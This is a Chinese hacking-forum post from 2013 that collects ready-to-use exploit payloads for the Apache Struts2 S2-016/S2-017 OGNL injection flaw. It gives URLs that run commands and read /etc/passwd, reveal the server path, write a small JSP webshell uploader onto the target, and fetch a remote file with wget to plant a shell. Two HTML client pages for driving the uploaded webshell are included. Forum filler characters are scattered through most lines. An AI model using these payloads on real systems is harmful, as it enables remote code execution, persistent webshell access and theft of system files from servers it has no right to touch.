

作者: admin    时间: 2013-7-18 23:03
标题: Struts2 S2-016/S2-017漏洞执行代码
大家都发了,我就整理了一下。友情提示,自己小命比shell重要哦。

喜欢就点一下感谢吧^_^
, R' D* j3 s+ j% X
带回显命令执行:

$ {  i6 h/ o1 j, I: ^/ D( ]( h/ ]http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
. f& W% L( N9 R+ D
' R' v( h7 ^1 X4 e$ a  l7 r/ c3 C5 S0 |) Y
) h4 N2 O5 e3 i! t5 K
$ n4 T  W; j6 ]) W. Z2 U" {  ~
# x+ ^* e0 [/ m9 t) O
* _  ~4 ^* d* {0 _' u; l& L
) b( g* D% U, s4 E# I2 l& S; a+ @' q2 F
爆路径:
( q5 E$ ]) |' k
6 i+ Z6 c) m6 m* Qhttp://www.example.com/struts2-b ... 8%29.close%28%29%7D
% I( B; M) }' P2 u, D- c; ?0 c3 D
: j9 n5 ^1 \0 @  B0 V1 Z) u/ @5 X3 G: `  ~: d8 k( i* v3 K
' y* _: h# S4 D( |' r# ?
8 d$ f4 g7 Y' U) D# w3 i
  ], R  P7 k' U6 V& L+ b1 |* x
写文件:
5 z. m# v5 P& x: h3 P
http://www.example.com/struts2-blank/example/X.action?redirect:${
# N2 ~: x" ^. U/ i0 @' b: C, |, o; s' I- H( m) f
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),* |8 H; [" b/ V+ D, x% n; O$ B$ ]

/ a- ?+ X, n- C, r, J7 ]%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),; r) P3 i' ]* O. \

  g$ J- g0 ~0 Q7 F  e5 q- |  Anew+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close(), @8 N4 w- \! K
( }. h  C; }; j- n0 _0 J0 w" |! d7 c( B
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e+ @1 p* q' r: F3 [) A

% @4 u9 o* o2 P' q) }9 M1 l
& n+ U4 I+ h. E5 h$ }; f, m3 z1 r* R$ Z& p  J5 q
写入的文件内容:
. D2 a$ F( G- U  p# q7 i& q! P
; O& T  v( _( W8 ?% E<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      * w5 F: A+ ^, [& A6 i8 s

其实就是一个jsp的小马,需要客户端配合

参数f是文件名,t是内容

客户端:
& M/ X5 E4 M" d' B* t
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">9 Y% b, I1 M& g) z

( e# L; F* @) {' X<textarea name=t cols=120 rows=10 width=45>your code</textarea>. t, i. Z3 o' _+ e% y

# ?  J8 E6 ~) l4 c* R5 S<center>% k* W' \1 o; T2 ]9 D: F5 \6 i6 N" J
- g* ]* W0 f' A& a- e) u4 R8 p

5 l8 T& v' f' G6 g- e+ [, a; B; a
<input type=submit value="提交">
  J, d% n) [7 ]- u- c/ r) P. ]0 Y0 }; X
</form>" P3 o. N4 H  u2 }
3 `( b1 y( b0 P0 H
就在当前目录建立一个fjp.jsp
) v. C: z, L8 \& s  |* H
shell:http://www.example.com/struts2-blank/example/fjp.jsp$ P0 W( a! h$ {8 Y: c. o
7 Y9 ~) K1 g6 m; X0 {/ U+ x& u8 i: j

% O- a5 s* F0 h) M6 {
还有@园长的一个客户端:
5 c: r' y* K# c. A9 s" z
7 A# C6 P8 ^( C6 x9 x2 \: j<html>- p, ]4 q; S' M5 H8 ~/ G. q0 l* i
( n4 u5 m" k2 r) u' R* i9 j: c- ?, R6 {
<head>
. T) u( N6 D9 V9 e& q$ k; V" n
; o6 Z* C& q4 }<meta http-equiv="content-type" content="text/html;charset=utf-8"># k% _) M0 Y3 _

0 i8 a  C/ c# Y2 n<title>jsp-园长</title>7 I' s( p+ H3 }. _3 o/ \( w, ^
. @6 H( m; D3 N2 c" Q" t3 u
</head>, z0 u" G9 x9 r5 ]  Y' e  ]

' d' q: K% u* R: _9 u9 Z- a6 J<style>( k" R3 s( I  g: E) R2 p

, e* @$ F  r& _1 |. `.main{width:980px;height:600px;margin:0 auto;}% f7 S9 S+ Y% @' K1 s. {, n
/ u: t0 Q7 l" c% V5 ~7 {: T  U
.url{width:300px;}% l8 N) h- I! |: }4 W& @& e! |

. l6 i' A/ l1 g9 ~5 o. u.fn{width:60px;}9 l6 s" K4 @5 L$ ?* A4 t' m) W; w
: E5 k) `) [7 E
.content{width:80%;height:60%;}
( ~5 C* p( E+ Z* \- B. S/ U$ h6 E: e/ _8 V
</style>) Y; C% O0 {, a/ c$ R

' I4 d4 V" s  Q$ M1 o: W, g/ o; W<script>
8 n9 a0 U5 {& x! O) c
6 S; R; {4 y" u9 ~* N  function upload(){0 ]5 X  A# [/ y' I6 a6 M- K' G

6 v6 U( ~) M; H/ _* N: q    var url = document.getElementById('url').value,) Q0 q; |3 N1 g( V5 y* Z* k" n4 b6 b

# l8 t7 i3 n8 q% y1 L# y      content = document.getElementById('content').value,
4 k+ ^: r' y" ^6 b) @9 k: u: K" W7 ]
2 R* Z( Q# Q/ |: T      fileName = document.getElementById('fn').value,
8 t  a6 h6 I2 ?: U8 }9 v8 R3 d: P
      form = document.getElementById('fm');
. t: o/ m, O7 z2 a: N, s
/ l. J5 ~# G) e5 W3 b0 {    if(url.length == 0){
& q( C% M+ ~, W$ X% ?2 K' X' q
7 z$ B$ Y  `7 w! U9 h+ q      alert("Url not allowd empty!");
/ H% C+ a, k0 W) E8 i; A
2 o- Z1 Z' `$ g/ k# Z# t# [: k      return ;! @, V1 `% h7 u

" v" p% `' T' |) O1 z, ^    }
+ v7 q2 |! ^  R4 z) F+ N1 D* J& l5 x, P/ F. n
    if(content.length == 0){" S1 E5 p: W+ u! a4 a

; B4 j2 b  L0 o4 i8 `      alert("Content not allowd empty!");
" D* s/ H3 v) S% r5 S' g8 S3 a# I1 o5 S5 n5 v4 B" c! G
      return ;
, V# a* x3 Z3 }8 d4 a- ]
. K  L. J2 H+ Q# k    }( B. u; i5 ?; p$ C! X% g

: L9 V7 t& m# n* ?' P    if(fileName.length == 0){+ i. T6 `1 S2 a; u2 r4 O
/ O8 ?1 W8 J* @1 v
      alert("FileName not allowd empty!");
4 w( l; P8 c3 q6 M: ^0 d" d" j0 d2 Z, d& Q+ v
      return ;( v; G" y6 {$ ^3 C" G0 J

, W0 m6 ~3 ^9 n* T! ?/ m    }
: E' {+ I) }  c6 F" B5 n6 n6 G
" x  T. ]. s( m, X* u& F: e) q    form.action = url;" V/ m0 r% d, F4 [6 O# [) z8 y9 d
. e! N  Y) g' p7 |& c5 t
    form.submit();
* g* R$ \- }8 q2 M9 V% F* q: Y! Z  L9 O' ~! h
  }5 z* N* }$ }  x% ?0 F9 q0 s

" H8 M, G6 z. e" C5 W4 Z: g</script>8 e' E1 k5 ~- _

) ^" M/ o8 @5 w; a<body>
  a2 e; F3 M1 h/ k
! d% v% G1 h! U, L9 ~<div class="main">- ]" G4 J) O: @$ r

# ]* q! T  E. ]+ e$ i' e6 [+ V1 ^# M) D  <form id="fm" method="post">  
7 N3 h4 V3 w4 L5 _9 e
% k: W) e6 {6 F7 t    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  + ^1 E- }9 ^1 _# l: B( b8 J
1 d& E7 ^+ c" [
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  & ~5 _2 i/ j9 ]& @0 b
) ~( n5 K& v; Q0 K5 L: p
    <a href="javascript:upload();">Upload</a>. H) j0 h5 J1 M6 z
. Y1 k/ q+ z! o3 z. Q
5 Z. S' e2 ^$ g9 n) B
! h, p. v3 ^! E  {- ^3 J
    <textarea id="content" class="content" name="t" ></textarea>
4 X. ^( I: p9 ?2 T+ Y$ e/ V& }9 E3 S* T* B: f* g
  </form>
* D* k% r# F" l* t9 b( v% j' L: J# Y
</div>6 m; G: E& i. A/ V5 z
2 m- `9 M: |% `- e, x
</body>
3 Q) @4 V; k: e% r& w: c3 g' G. o7 A% h# ^/ f( Y
</html>8 i* n; E$ d1 {4 `

7 Y, f( k, q! X8 M( \+ Q6 `; ^9 J2 \9 y2 [, w! x$ t* X
8 _7 U# b2 h1 w4 U
还有@X发的一个wget的getshell
; F' c2 K. t/ g/ j  P, c  S0 k- a/ c
?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}  V. I4 F6 U& n! J2 H3 `4 y

3 s) o0 b0 O8 w# z4 M)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}



